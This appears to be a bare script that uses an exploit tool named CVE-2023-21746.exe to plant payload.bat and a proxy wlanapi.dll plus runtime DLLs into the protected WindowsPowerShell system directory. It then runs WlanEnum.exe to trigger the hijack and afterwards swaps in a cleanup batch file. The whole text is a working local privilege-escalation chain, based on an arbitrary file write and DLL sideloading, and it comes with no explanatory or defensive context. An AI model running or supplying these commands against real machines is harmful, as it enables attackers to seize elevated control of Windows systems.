.\CVE-2023-21746.exe -i .\payload.bat -o \Windows\System32\WindowsPowerShell\v1.0\payload.bat
.\CVE-2023-21746.exe -i .\ucrtbased.dll -o \Windows\System32\WindowsPowerShell\v1.0\ucrtbased.dll
.\CVE-2023-21746.exe -i .\vcruntime140_1d.dll -o Windows\System32\WindowsPowerShell\v1.0\vcruntime140_1d.dll
.\CVE-2023-21746.exe -i .\vcruntime140d.dll -o Windows\System32\WindowsPowerShell\v1.0\vcruntime140d.dll
.\CVE-2023-21746.exe -i .\wlanapi.dll -o Windows\System32\WindowsPowerShell\v1.0\wlanapi.dll
.\CVE-2023-21746.exe -i .\wlanapi_orig.dll -o Windows\System32\WindowsPowerShell\v1.0\wlanapi_orig.dll
.\CVE-2023-21746.exe -i .\msvcp140d.dll -o Windows\System32\WindowsPowerShell\v1.0\msvcp140d.dll
& .\WlanEnum.exe
.\CVE-2023-21746.exe -i .\cleanup.bat -o \Windows\System32\WindowsPowerShell\v1.0\payload.bat
